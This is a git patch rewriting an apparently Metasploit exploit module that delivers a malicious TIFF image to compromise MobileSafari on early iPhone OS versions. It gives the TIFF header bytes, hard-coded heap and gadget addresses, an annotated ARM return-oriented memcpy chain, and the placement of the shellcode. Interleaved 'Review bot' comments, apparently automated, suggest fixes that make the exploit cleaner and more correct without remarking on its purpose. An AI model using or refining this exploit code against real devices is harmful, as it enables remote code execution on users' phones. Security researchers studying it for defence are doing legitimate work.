From 49a54dfb6fef87eb033dedf0268da3d321de123d Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Tue, 16 Oct 2007 05:29:13 +0000
Subject: [PATCH] Total rewrite using a supah-sweet new return method.
git-svn-id: file:///home/svn/framework3/trunk@5148 4d416f70-5f16-0410-b530-b9f4589650da
---
modules/exploits/osx/armle/safari_libtiff.rb | 153 ++++++++++---------
1 file changed, 83 insertions(+), 70 deletions(-)
diff --git a/modules/exploits/osx/armle/safari_libtiff.rb b/modules/exploits/osx/armle/safari_libtiff.rb
index 5880bf2c26..6fea291f68 100644
--- a/modules/exploits/osx/armle/safari_libtiff.rb
+++ b/modules/exploits/osx/armle/safari_libtiff.rb
@@ -41,7 +41,7 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 ],
 'Payload' => {
- 'Space' => 300,
+ 'Space' => 3800,
 'BadChars' => "",
 # Multi-threaded applications are not allowed to execve() on OS X
@@ -58,32 +58,18 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 },
 'Targets' => [
- [ 'MobileSafari iPhone Mac OS X Automatic',
- {
- 'Platform' => 'osx',
- 'Arch' => ARCH_ARMLE,
- 'Automatic' => true
- }
- ],
-
- [ 'MobileSafari iPhone Mac OS X armle (1.00, 1.01, 1.02)',
+
+ [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
 {
 'Platform' => 'osx',
- 'Arch' => ARCH_ARMLE,
- 'Stack' => 0x0055a5bc,
- 'Heap' => 0x0006b400,
- 'Memcpy' => 0x3009a1bc,
+
+ # Scratch space for our shellcode and stack
+ 'Heap' => 0x00802000,
+
+ # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
+ 'Magic' => 0x300d562c,
 }
- ],
- [ 'MobileSafari iPhone Mac OS X armle (1.1.1)',
- {
- 'Platform' => 'osx',
- 'Arch' => ARCH_ARMLE,
- 'Stack' => 0x006f75bc,
- 'Heap' => 0x0006c400,
- 'Memcpy' => 0x3009a1bc,
- }
- ],
+ ],
 ],
 'DefaultTarget' => 0,
 'DisclosureDate' => 'Aug 01 2006'
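Review bot: The single remaining target no longer carries the `'Arch' => ARCH_ARMLE` key that all three removed targets declared, so the targets list no longer states an architecture; unless the module sets `Arch` in its top-level info (outside this hunk), consider keeping `'Arch' => ARCH_ARMLE,` alongside `'Platform' => 'osx'` so the target metadata stays complete. The new entry also opens with an added empty line inside the `'Targets'` array, which the previous layout did not have. The `Heap` and `Magic` comments are welcome, but the `Space` jump from 300 to 3800 in the hunk just above is left unexplained — a one-line comment tying it to the 0x1000-byte buffer built in generate_tiff would help the next reader.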
@@ -92,20 +78,14 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 def on_request_uri(cli, req)
+ # Re-generate the payload
 return if ((p = regenerate_payload(cli)) == nil)
+ # Grab reference to the target
 t = target
- if(target['Automatic'])
- t = self.targets[1]
- case req.headers['User-Agent']
- when /iPhone.*420\.1/
- t = self.targets[2]
- end
- end
-
- print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport} #{t.name}...")
+ print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
 # Transmit the compressed response to the client
 send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })
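Review bot: With the User-Agent dispatch removed, `t` survives only as an alias for `target`, so the new `# Grab reference to the target` comment annotates a local that no longer does anything; either call `send_response(cli, generate_tiff(p, target), { 'Content-Type' => 'image/tiff' })` directly or keep `t` and drop the comment. The `req` parameter is also unused now that `req.headers['User-Agent']` is gone; since the signature is dictated by the framework, renaming it `_req` or saying so in a comment would make the intent clear. on_request_uri's closing `end` lies outside the hunk.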
@@ -116,50 +96,83 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 def generate_tiff(code, targ)
- path = File.join(Msf::Config.install_root, "data", "exploits", "iphone_libtiff.bin")
-
- print_status("Opening file...")
- data = File.read(path, File.size(path))
- print_status("Done...")
- #
- # The basic idea:
- #
- # Overwrite return address with: ldmia sp!, {r0, r1, r2, r3, pc}
- # This loads r0-r3 and pc from the stack, jumping to the address in pc
- # The address in pc is the real address of memcpy(), which takes
- # parameters via the r0-r3 registers. We memcpy the stack address
- # (which seems to be static across all versions) to an unused page
- # on the heap. Finally, we patch up a local variable (r6) and then
- # return back to the heap location we copied the stack to.
+ # This is a TIFF file, we have a huge range of evasion
+ # capabilities, but for now, we don't use them.
+ # - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
 #
+
+ dlen = 0x1000
+ data =
+ "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+ "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
+ "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+
+ "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+
+ "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+
+ "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+
+ "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
+ "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
+ "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
+ [dlen].pack("V") +
+ "\x84\x00\x00\x00\x00\x00\x00\x00"
+
- dst_ptr = targ['Heap']
- src_ptr = targ['Stack']
- shl_len = 168 + payload.encoded.length
-
- # Still some wonky characters in here, this doesn't work with alpha/english/etc
- patt = pattern_create(shl_len)
-
- # 300df800 e8bd800f ldmia sp!, {r0, r1, r2, r3, pc}
- patt[120,4] = [0x300df800].pack("V")
-
- # memcpy(r0, r1, r2)
- patt[140,4] = [targ['Memcpy']].pack("V") # memcpy @ 0x3009a1bc
- patt[124,4] = [dst_ptr].pack("V") # dst
- patt[128,4] = [src_ptr].pack("V") # src
- patt[132,4] = [shl_len].pack("V") # len
+ # Randomize the bajeezus out of our data
+ patt = rand_text(dlen)
- # fix up r6 to bypass an exception
- patt[112,4] = [dst_ptr + shl_len].pack("V")
+ # Were going to candy mountain!
+ patt[120, 4] = [target['Magic']].pack("V")
+
+ # >> add r0, r4, #0x30
+ patt[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")
+
+ # Candy mountain, Charlie!
+ # >> mov r1, sp
+
+ # It will be an adventure!
+ # >> mov r2, r8
+ patt[ 92, 4] = [ patt.length ].pack("V")
+
+ # Its a magic leoplurodon!
+ # It has spoken!
+ # It has shown us the way!
+ # >> bl _memcpy
+
+ # Its just over this bridge, Charlie!
+ # This magical bridge!
+ # >> ldr r3, [r4, #32]
+ # >> ldrt r3, [pc], r3, lsr #30
+ # >> str r3, [r4, #32]
+ # >> ldr r3, [r4, #36]
+ # >> ldrt r3, [pc], r3, lsr #30
+ # >> str r3, [r4, #36]
+ # >> ldr r3, [r4, #40]
+ # >> ldrt r3, [pc], r3, lsr #30
+ # >> str r3, [r4, #40]
+ # >> ldr r3, [r4, #44]
+ # >> ldrt r3, [pc], r3, lsr #30
+ # >> str r3, [r4, #44]
+
+ # We made it to candy mountain!
+ # Go inside Charlie!
+ # sub sp, r7, #0x14
+ patt[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")
+
+ # Goodbye Charlie!
+ # ;; targ['Heap'] + 0x48 becomes the stack pointer
+ # >> ldmia sp!, {r8, r10}
+
+ # Hey, what the...!
+ # >> ldmia sp!, {r4, r5, r6, r7, pc}
- # Return back to our copied stack data
- patt[164,4] = [dst_ptr + 168].pack("V")
-
- # Stick our shellcode into the buffer
- patt[168, payload.encoded.length] = payload.encoded
+ # Return back to the copied heap data
+ patt[192, 4] = [ targ['Heap'] + 196 ].pack("V")
+ # Insert our actual shellcode at heap location + 196
+ patt[196, payload.encoded.length] = payload.encoded
+ data << patt
 data
 end
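Review bot: `patt[120, 4] = [target['Magic']].pack("V")` reads the module-level `target` while the neighbouring patches (`patt[104, 4]`, `patt[116, 4]`, `patt[192, 4]`) read the `targ` parameter; with a single target both resolve to the same hash today, but the method should use `targ['Magic']` so its behaviour follows its argument. Likewise the `code` parameter is never read: the shellcode is taken from `payload.encoded` at `patt[196, ...]` even though on_request_uri passes the result of regenerate_payload in as `code`. Either read the shellcode from `code` (presumably `code.encoded`, depending on what regenerate_payload returns) or drop the unused parameter from the signature and its caller. The method spans the whole hunk, ending at the `end` on its last line.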